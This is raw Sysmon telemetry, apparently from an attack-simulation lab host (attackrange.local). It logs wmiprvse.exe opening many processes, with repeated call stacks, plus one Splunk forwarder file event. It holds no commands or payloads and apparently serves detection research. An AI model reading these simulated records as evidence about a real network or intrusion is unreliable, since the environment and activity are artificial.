16:54:42.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242369Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242368Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242367Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242366Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242365Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242364Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242363Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242362Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242361Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242360Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242359Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242358Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242357Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242356Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.748{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10C27C6A1701C588B83B469743A0BE72,SHA256=6FC9A4C21EF6786FAB605B91450B25EC3D589A74D9889493C31CECD68A6ADDDB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242355Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242354Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242353Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242352Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242351Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242350Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 